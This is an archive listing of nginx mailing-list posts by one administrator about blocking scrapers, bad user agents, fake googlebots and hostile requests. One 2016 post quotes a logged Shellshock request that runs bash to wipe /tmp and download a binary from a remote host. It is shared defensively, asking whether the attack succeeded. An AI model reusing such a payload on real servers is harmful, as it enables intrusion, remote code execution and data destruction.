Question regarding $invalid_referer

2024-03-05 Thread li...@lazygranch.com
I am presently using a scheme like this to prevent scraping documents. location /images/ { valid_referers none blocked www.example.com example.com forums.othersite.com ; # you can tell the browser that it can only download content from the

Re: nginx redirects all requests to root

2022-06-20 Thread li...@lazygranch.com
On Mon, 20 Jun 2022 17:23:23 -0400 "_lukman_" wrote: > server > { >listen 443 default_server ssl; >listen [::]:443 ssl http2; >server_name dummysite.io www.dummysite.io; >ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; # > managed by Certbot >

Re: 200 html return to log4j exploit

2021-12-20 Thread li...@lazygranch.com
ry to > interpolate these, and thus be vulnerable to the exploit. > > On Mon, 20 Dec 2021 at 04:02, li...@lazygranch.com > wrote: > > > I don't have any service using java so I don't believe I am subject > > to this exploit. However I am confused why a returned a 200 for >

200 html return to log4j exploit

2021-12-19 Thread li...@lazygranch.com
I don't have any service using java so I don't believe I am subject to this exploit. However I am confused why a returned a 200 for this request. The special characters in the URL are confusing. 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET / HTTP/1.1" 706

Re: Nginx not responding to port 80 on public IP address

2021-02-04 Thread li...@lazygranch.com
I insist on encryption so this is what I use: server { listen 80; server_name yourdomain.com www.yourdomain.com ; if ($request_method !~ ^(GET|HEAD)$ ) { return 444; } return 301 https://$host$request_uri; } I only serve static pages so I use

Re: Prevent direct access to files but allow download from site

2020-03-11 Thread li...@lazygranch.com
Answers intermixed below. On Wed, 11 Mar 2020 21:23:15 -0400 "MAXMAXarena" wrote: > Hello @Ralph Seichter, > what do you mean by "mutually exclusive"? > As for the tools I mentioned, it was just an example. > Are you telling me I can't solve this problem? > > > Hello @garic, > thanks for this

Re: Possible memory leak?

2019-03-08 Thread li...@lazygranch.com
On Fri, 08 Mar 2019 10:42:28 -0500 "wkbrad" wrote: > Thanks for that info. It's definitely harder to notice the issue on > small servers like that. But you are still seeing about a 50% > increase in ram usage there by your own tests. > > The smallest server I've tested this on uses about 20M

Re: Possible memory leak?

2019-03-07 Thread li...@lazygranch.com
On Thu, 07 Mar 2019 13:33:39 -0500 "wkbrad" wrote: > Hi all, > > I just wanted to share the details of what I've found about this > issue. Also thanks to Maxim Dounin and Reinis Rozitis who gave some > really great answers! > > The more I look into this the more I'm convinced this is an issue

Re: I need my “bad user agent” map not to block my rss xml file

2019-01-10 Thread li...@lazygranch.com
On Thu, 10 Jan 2019 08:50:33 + Francis Daly wrote: > On Wed, Jan 09, 2019 at 06:14:04PM -0800, li...@lazygranch.com wrote: > > Hi there, > > > location / { > > if ($badagent) { return 403; } > > } > > location = /feeds { >

Re: I need my “bad user agent” map not to block my rss xml file

2019-01-09 Thread li...@lazygranch.com
On Wed, 9 Jan 2019 08:20:05 + Francis Daly wrote: > On Tue, Jan 08, 2019 at 07:30:44PM -0800, li...@lazygranch.com wrote: > > Hi there, > > > Stripping down the nginx.conf file: > > > > server{ > > location / { > > root

Need logic to not check for bad user agent if xml file

2018-12-20 Thread li...@lazygranch.com
I have a map to check for bad user agents called badagent. I want to set up a RSS feed. The feedreaders can have funny agents, so I need to omit the bad agent check if the file is any xml type. This is rejected. if (($request_uri != [*.xml]) && ($badagent)) {return 444; } Suggestions?

Dynamic modules versus build from scratch

2018-05-16 Thread li...@lazygranch.com
The centos nginx from the repo lacks ngx_http_hls_module. This is a technique to add the module without compilation. https://dzhorov.com/2017/04/compiling-dynamic-modules-into-nginx-centos-7 Does anyone have experience with this? I'd like to avoid building nginx from scratch to make the updates

Re: Aborting malicious requests

2018-03-20 Thread li...@lazygranch.com
On Tue, 20 Mar 2018 13:03:09 + "Friscia, Michael" wrote: > This is great, thank you again, this is a huge jumpstart! Per NIST best practices, you should limit the HTML verbs that you allow. A very simple website can run on just GET and HEAD. Here is how you 444

Re: Aborting malicious requests

2018-03-19 Thread li...@lazygranch.com
On Mon, 19 Mar 2018 12:31:20 + "Friscia, Michael" wrote: > Just a thought before I start crafting one. I am creating a > location{} block with the intention of populating it with a ton of > requests I want to terminate immediately with a 444 response. Before > I

Re: newbie: nginx rtmp module

2018-03-09 Thread li...@lazygranch.com
I had a few neurons fire. I forgot nginx can load dynamic modules. https://www.nginx.com/blog/nginx-dynamic-modules-how-they-work/ I haven't done this myself, so you are on your own at this point. On Fri, 09 Mar 2018 11:59:30 -0500 "neuronetv" wrote: > I've

Re: Flush access log buffer

2018-02-26 Thread li...@lazygranch.com
On Fri, 23 Feb 2018 18:54:48 -0800 "li...@lazygranch.com" <li...@lazygranch.com> wrote: > On Thu, 22 Feb 2018 18:40:12 -0800 > "li...@lazygranch.com" <li...@lazygranch.com> wrote: > > > When I was using FreeBSD, the access log was real time

MAP location in conf file

2017-12-28 Thread li...@lazygranch.com
Presently I'm putting maps in the server location. Can they be put in the very top to make them work for all servers? If not, I can just make the maps into include files and insert as needed, but maybe making the map global is more efficient.

Re: Centos 7 file permission problem

2017-12-20 Thread li...@lazygranch.com
<aroz...@nginx.com> wrote: > Hi, > > have you checked this with disabled selinux ? > > br, > Aziz. > > > > > > > On 20 Dec 2017, at 11:07, li...@lazygranch.com wrote: > > > > I'm setting up a web server on a Centos 7 VPS. I'm relat

Centos 7 file permission problem

2017-12-20 Thread li...@lazygranch.com
I'm setting up a web server on a Centos 7 VPS. I'm relatively sure I have the firewalls set up properly since I can see my browser requests in the access and error log. That said, I have a file permission problem. nginx 1.12.2 Linux servername 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50

Re: How to control the total requests in Nginx

2017-11-30 Thread li...@lazygranch.com
Here is a log of real life IP limiting with a 30 connection limit: 86.184.152.14 British Telecommunications PLC 8.37.235.199 Level 3 Communications Inc. 130.76.186.14 The Boeing Company security.5.bz2:Nov 29 20:50:53 theranch kernel: ipfw: 5005 drop session type 40 86.184.152.14 58714 -> myip

Response code 400 rather than 404

2017-07-17 Thread li...@lazygranch.com
I'm curious why this request got a 400 response rather than a 404. 400 123.160.235.162 - - [16/Jul/2017:22:56:30 +] "GET /currentsetting.htm HTTP/1.1" 173 "-" "-" "-" log_format main '$status $remote_addr - $remote_user [$time_local] "$request" ' '$body_bytes_sent

Re: FreeBSD Clean Install nginx.pid Permissions Errors

2017-07-13 Thread li...@lazygranch.com
On Thu, 13 Jul 2017 23:46:12 +0100 Francis Daly wrote: > On Thu, Jul 13, 2017 at 09:37:08AM -0400, Viaduct Lists wrote: > > Hi there, > > > [Wed Jul 12 06:08:41 rich@neb /var/log/nginx] nginx -t > > If you were running this command as "root", would that prompt say >

Re: block google app

2017-06-21 Thread li...@lazygranch.com
I'm sending 403 responses now, so I screwed up by mistaking the fields in the logs. I'm going back to lurking mode again with my tail shamefully between my legs. This code in the image location section will block the google app: if ($http_user_agent ~*

Re: block google app

2017-06-21 Thread li...@lazygranch.com
Actually I think I was mistaken and the field is the user agent. I will change the variable and see what happens. I did some experiments to show the pattern match works. On Tue, 20 Jun 2017 20:56:46 -0700 li...@lazygranch.com wrote: > I want to block by referrer. I provided a more "

Re: block google app

2017-06-20 Thread li...@lazygranch.com
On Tue, 20 Jun 2017 17:49:14 -0700 Robert Paprocki <rpapro...@fearnothingproductions.net> wrote: > Do you mean $http_user_agent? > > > On Jun 20, 2017, at 17:36, "li...@lazygranch.com" > > <li...@lazygranch.com> wrote: > > > > I would

block google app

2017-06-20 Thread li...@lazygranch.com
I would like to block the google app from directly downloading images. access.log: 200 186.155.157.9 - - [20/Jun/2017:00:35:47 +] "GET /images/photo.jpg HTTP/1.1" 334052 "-" "com.google.GoogleMobile/28.0.0 iPad/9.3.5 hw/iPad2_5" "-" My nginx code in the images location: if

Re: WordPress pingback mitigation

2017-05-21 Thread li...@lazygranch.com
Here is the map. I truncated my bad agent list, but will get you started. I used the user agent changer in Chromium to make sure it worked. - map $http_user_agent $badagent { default 0; ~*WordPress

hacker proxy attempt

2017-04-29 Thread li...@lazygranch.com
A bit OT, but can a guru verify I rejected all these proxy attempts. I'm 99.9% sure, but I'd hate to allow some spammer or worse to route through my server. The only edit I made is when they ran my IP address through a forum spam checker. (I assume google indexes pastebin.)

Is this a valid request?

2016-11-14 Thread li...@lazygranch.com
I keep my nginx server set up dumb. (Don't need anything fancy at the moment). Is this request below possibly valid? I flag anything with a question mark in it as hacking, but maybe IOS makes some requests that some websites will process, and others would just ignore after the question mark. 444

Unexpected return code

2016-11-08 Thread li...@lazygranch.com
I only serve static pages, hence I have this in my conf file: --- ## Only allow these request methods ## if ($request_method !~ ^(GET|HEAD)$ ) { return 444; } Shouldn't the return code be 444 instead of 400?

Re: Hacker log

2016-10-22 Thread li...@lazygranch.com
On Sat, 22 Oct 2016 17:40:56 -0400 "itpp2012" wrote: > The idea is nice but pointless, if you maintain this list over 6 > months you most likely will end up blocking just about everyone. > > Stick to common sense with your config, lock down nginx and the > backends,

Hacker log

2016-10-22 Thread li...@lazygranch.com
http://pastebin.com/7W0uDrLa If you need an extensive list of hacker requests (over 200), I put this log entry on pastebin. As mentioned at the top of the pastebin, the hacker used my IP address directly rather than my domain name. I have a "map" that detects typical hacker activity. Perhaps in

Re: fake googlebots

2016-09-28 Thread li...@lazygranch.com
http://pastebin.com/tZZg3RbA/?e=1 This is the access.log file data relevant to that fake googlebot. It starts with a fake googlebot entry, then goes downhill from there. I rate limit at 10/s. I only allow the verbs HEAD and GET, so the POST went to 444 directly. I replaced the domain with a fake

fake googlebots

2016-09-25 Thread li...@lazygranch.com
I got a spoofed googlebot hit. It was easy to detect since there were probably a hundred requests that triggered my hacker detection map scheme. Only two requests received a 200 return and both were harmless. 200 118.193.176.53 - - [25/Sep/2016:17:45:23 +] "GET / HTTP/1.1" 847 "-"

Re: limit-req and greedy UAs

2016-09-13 Thread li...@lazygranch.com
should try to duplicate this in the event it has something to do with my setup. On Mon, 12 Sep 2016 15:30:01 -0700 li...@lazygranch.com wrote: > Most of the chatter on the interwebs believes that the rate limit is > per connection, so if some IP opens up multiple connections, they get

Re: Problems with custom log file format

2016-08-23 Thread li...@lazygranch.com
Link goes to conf file https://www.dropbox.com/s/1gz5139s4q3b7e0/nginx.conf?dl=0 On Tue, 23 Aug 2016 20:51:55 +0300 "Reinis Rozitis" wrote: > > Configuration file included in the post. I already checked it. > > You have shown only few excerpts (like there might be other >

Problems with custom log file format

2016-08-21 Thread li...@lazygranch.com
Nginx 1.10.1,2 FreeBSD 10.2-RELEASE-p18 #0: Sat May 28 08:53:43 UTC 2016 I'm using the "map" module to detect obvious hacking by detecting keywords. (Yes, I know about Naxsi.) Finding the really dumb hacks is easy. I give them a 444 return code with the idea being I can run a script on the log

Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread li...@lazygranch.com
On Sat, 30 Jul 2016 23:49:30 +0300 "Valentin V. Bartenev" <vb...@nginx.com> wrote: > On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote: > > On Sat, 30 Jul 2016 13:18:47 +0300 > > "Valentin V. Bartenev" <vb...@nginx.com> wrote

Bash script; Was it executed?

2016-07-30 Thread li...@lazygranch.com
I see a return code of 200. Does that mean this script was executed? - 219.153.48.45 - - [30/Jul/2016:07:40:07 +] "GET / HTTP/1.1" 200 643 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma >> /tmp/Run.sh;echo

Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread li...@lazygranch.com
On Sat, 30 Jul 2016 13:18:47 +0300 "Valentin V. Bartenev" <vb...@nginx.com> wrote: > On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote: > > I see a fair amount of hacking attempts in the access.log. That is, > > they > show up with a return